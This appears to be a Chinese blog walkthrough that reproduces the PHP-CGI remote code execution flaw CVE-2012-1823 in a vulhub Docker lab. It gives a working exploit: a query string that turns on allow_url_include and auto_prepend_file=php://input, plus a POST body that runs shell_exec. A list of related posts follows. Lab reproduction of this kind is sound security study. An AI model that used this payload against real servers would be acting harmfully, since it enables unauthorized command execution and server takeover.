PHP-CGI远程代码执行

最新推荐文章于 2024-06-11 16:21:13 发布
最新推荐文章于 2024-06-11 16:21:13 发布
阅读量2.6k 收藏
点赞数
分类专栏: 中间件漏洞 文章标签: 安全 web安全 phpcgi
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_48985780/article/details/121487854
版权
本文详细介绍了PHP-CGI的远程代码执行漏洞(CVE-2012-1823),包括漏洞环境搭建、利用方法以及如何通过Burp Suite进行POST请求修改以实现命令执行。通过示例展示了如何利用特定参数如`-d`来开启危险的配置选项,最终获取服务器的权限。
摘要由CSDN通过智能技术生成

PHP-CGI远程代码执行

漏洞利用知识:

CGI模式下的参数:

        -c 指定php.ini文件的位置

        -n 不要加载php.ini文件

        -d 指定配置项

        -b 启动fastcgi进程

        -s 显示文件源码

        -T 执行指定次该文件

        -h和-? 显示帮助

环境搭建:

这里采用vulhub环境,参考文件

漏洞利用:

启动漏洞环境

进入 CVE-2012-1823
启动

sudo docker-compose up

 

查看正在运行的docker容器

docker ps 

 

访问一下index.php,没问题

 

-s显示源码

 

-d执行命令

?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input

<?php echo shell_exec('id');?> 

用burp抓包修改包(这里要请求方式要改为POST)

 

返回结果,上传成功。

 

 

xzhome
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PHP-CGI Windows平台远程代码执行漏洞复现(CVE-2024-4577)
0xSec
06-08 3016
2024年6月,PHP官方发布新版本,修复了PHP-CGI中一个远程代码执行漏洞。鉴于该漏洞无前置条件,易于利用,且默认情况下可获取操作系统权限,建议所有使用受影响版本的企业尽快升级修复,以确保安全
(CVE-2012-1823)PHP-CGI远程代码执行漏洞
weixin_45253622的博客
05-20 1374
漏洞原理 php-cgi是一个类似于消息的“传递者”,它接收web容器收到的http数据包,并把里面的数据交给PHP解释器执行php-cgi有两个功能,一是提供cgi方式的交互,二是提供fastcgi方式的交互。 cgi方式:web容器接收到http数据包后,拿到用户请求的文件(cgi脚本),并fork除一个子进程(解释器)去执行这个文件,然后拿到执行结果,直接返回给用户,然后子进程结束,但是这个cgi模式不能接收同时接收大量的请求,因为创建进程的时候会消耗服务器资源,资源也不是无限的,所以有了
CGI,FastCGIPHP-CGIPHP-FPM概念分析
fisher的博客
03-25 1295
CGI CGI全称是“公共网关接口”(Common Gateway Interface),HTTP服务器与你的或其它机器上的程序进行“交谈”的一种工具,其程序须运行在网络服务器上。 CGI可以用任何一种语言编写,只要这种语言具有标准输入、输出和环境变量。如php,perl,tcl等。 FastCGI FastCGI像是一个常驻(long-live)型的CGI,它可以一直执行
php cgi 执行,php cgi远程任意代码执行漏洞
weixin_39520353的博客
03-10 132
国外又发布了一个牛逼闪闪的php cgi远程任意代码执行漏洞:http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/粗看一下貌似没啥危害,因为php做了防范,在cgi这个sapi下是无法使用-r,-f等直接执行命令的参数的。只有少数几个参数可以使用,因此公告里也就给出了使用-s参数读取源文件的poc。另外关于RCE的PoC原文没有给...
php cgi-wrap远程代码执行漏洞
liu510817387的专栏
05-04 1446
国外安全组织研究称如果以cgi-wrap的方式的方式去调用php,就可能导致远程代码执行漏洞导致服务器沦陷,乌云已经证明并且确认该问题存在,国内较主要虚拟主机提供商已经证明受此问题影响,可导致网站沦陷,在补丁正式发布之前注意服务器防护和监控。
php-cgi
is_scarecrow的博客
06-24 201
【fastCGI的进程管理】fastcgi会先启动一个master,解析配置文件,初始化执行环境,然后再启动多个worker,当请求过来的时候,master会传递给一个worker,然后立即可以接收下一个请求,这样就避免重复的劳动,效率自然也就高了,而且当worker不够用时,master可以根据配置预先启动几个worker等着,当然worker太多的时候,也会停掉一些,这样就提高到了性能,同时一定程度上节约了资源。Php-cgiPHP解释器,就是上文提到的CGI程序。
PHP-CGI远程代码执行漏洞分析与防范
10-19
PHP-CGI远程代码执行漏洞分析与防范知识要点: 一、PHP-CGI远程代码执行漏洞概述 PHP-CGI远程代码执行漏洞(CVE-2012-1823)是一个严重的安全漏洞,它允许远程攻击者通过构造特殊的HTTP请求,执行任意PHP代码。这个...
[vulhub]:CVE-2012-1823 php-cgi远程代码执行
qq_43756450的博客
02-28 448
[vulhub]:CVE-2012-1823 php-cgi远程代码执行 Author:badbird Time:2020-2-6 该漏洞只出现在以cgi模式运行的php中。影响范围 < 5.3.12 < 5.4.2 0x01 预备知识 ​ 什么是CGI? ​ Common Gateway Interface 即“通用网关接口”。用于处理浏览器(客户端)向服务器发送的数据,在服务器上部署。CGI实际上是一种数据处理的协议,相当于Web服务器“背后的女人”。 ​ CGI做了什么工作?
PHPCGI实现
weixin_34301307的博客
06-09 138
FastCGI简介 CGI全称是“通用网关接口”(Common Gateway Interface), 它可以让一个客户端,从网页浏览器向执行Web服务器上的程序请求数据。 CGI描述了客户端和这个程序之间传输数据的一种标准。 CGI的一个目的是要独立于任何语言的,所以CGI可以用任何一种语言编写,只要这种语言具有标准输入、输出和环境变量。如php,perl,tcl等 FastCGI像是...
phpcgi 代码执行 (CVE-2012-1823) 复现
YouthBelief的博客
11-04 706
@[TOC](phpcgi 代码执行 (CVE-2012-1823)) phpcgi 代码执行 (CVE-2012-1823) 通过阅读源码,发现cgi模式下通过可控命令行参数有如下一些参数可用: -c 指定php.ini文件的位置 -n 不要加载php.ini文件 -d 指定配置项 -b 启动fastcgi进程 -s 显示文件源码 -T 执行指定次该文件 -h和-? 显示帮助 访问下边页面 返回源码 说明存在该漏洞 ip:port/index.php/?-s 0x01 漏洞描述 CGI全称是“通用网关接
php-cgi程序,CGIPHP-CGI、FastCGI
weixin_34900419的博客
03-21 298
CGI一. CGI是什么CGI,全称是Common Gateway Interface,翻译过来就是“通用网关接口”,定义了一个接口标准,描述了数据怎么在服务器和外部应用程序之间怎么传递。二. CGI的来历在很早之前,互联网只有些静态内容,浏览器发送资源请求,服务器接受请求并返回服务器上的静态文件即可。随着互联网的发展,动态内容产生了,这些动态内容涉及到了数据库,能够操作数据库的动态语言将数据处理...
聊聊 CGI FastCGI,php-cgi
python小霸王
02-28 933
一、学习当中遇到的问题 什么是php-cgi ?         答:php-cgiphp的解释器,php-cgi是一个 CGI程序(为什么说是一个CGI程序呢,CGI 定义了Web服务器与外部应用程序之间的通信接口标准,php-cgi是基于这个CGI协议标准实现的,同样,C/C++,python,VB都可以实现CGI程序,需要支持标准的输入输出和环境变量) php-fpm
php cgi 执行,PHP-CGI远程任意代码执行漏洞
weixin_42525672的博客
03-10 581
PHP-CGI远程任意代码执行漏洞发布日期:2012-05-03更新日期:2012-05-04受影响系统:PHP PHP描述:--------------------------------------------------------------------------------CVE ID: CVE-2012-1823PHP是一种HTML内嵌式的语言,PHP与微软的ASP颇有几分相似,都是...
PHP-CGI Windows平台远程代码执行漏洞(CVE-2024-4577)
最新发布
做自己喜欢的事,并将其发挥到极致!
06-11 2037
PHP 在设计时忽略 Windows 中对字符转换的Best-Fit 特性,当 PHP-CGI 运行在Window平台且使用了如下语系(简体中文936/繁体中文950/日文932等)时,攻击者可构造恶意请求绕过 CVE-2012-1823 补丁,从而可在无需登陆的情况下执行任意PHP代码
PHP - CGI, Fast-FGI, PHP-FPM以及优化手段 - 学习/实践
"代码"的日常搬运
04-22 976
主要用于了解学习cgi, fast cgi,以及FPM,对应的php-cgiphp-fast cgiphp-fpm之间的关系, 更加深入了解PHPweb server之间的工作机制~
CVE-2019-11043 PHP远程代码执行
qq_46804551的博客
02-05 202
CVE-2019-11043 PHP远程代码执行 该漏洞是某比赛解决一道CTF题目时发现,向目标服务器URL发送%0a符号时,服务返回异常发现的漏洞 2019年9月26日,PHP官方发布漏洞通告,其中指出,使用Nginx+php-fpm的服务器,在部分配置下,存在远程代码执行漏洞,且该配置已被广泛使用,危害较大,影响较为广泛。 漏洞环境: git clone https://github.com/vulhub/vulhub.git cd vulhub/php/CVE-2019-11043
PHPCGI配置
酒徒词客
07-29 1391
第2章 PHP(FastCGI) 一、什么是FastCGI FastCGI是一个可伸缩、高速在HTTP server和动态脚本语言之间的一个通信接口.大多数的HTTP server都支持FastCGI,比如:Nginx Aapache lighttpd等..FastCGI被很多语言所支持。其中就有PHP. 二、Nginx+FastCGI运行原理 (1)Nginx不支持对外程
远程代码执行防护的实验
04-02
该命令会加载一个用于测试PHP CGI远程代码执行漏洞的工具。 3. 接下来,我们需要设置攻击参数。输入以下命令: ``` set RHOST <目标系统IP地址> set RPORT <目标系统端口号> set PAYLOAD <攻击载荷> ``` 其中,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值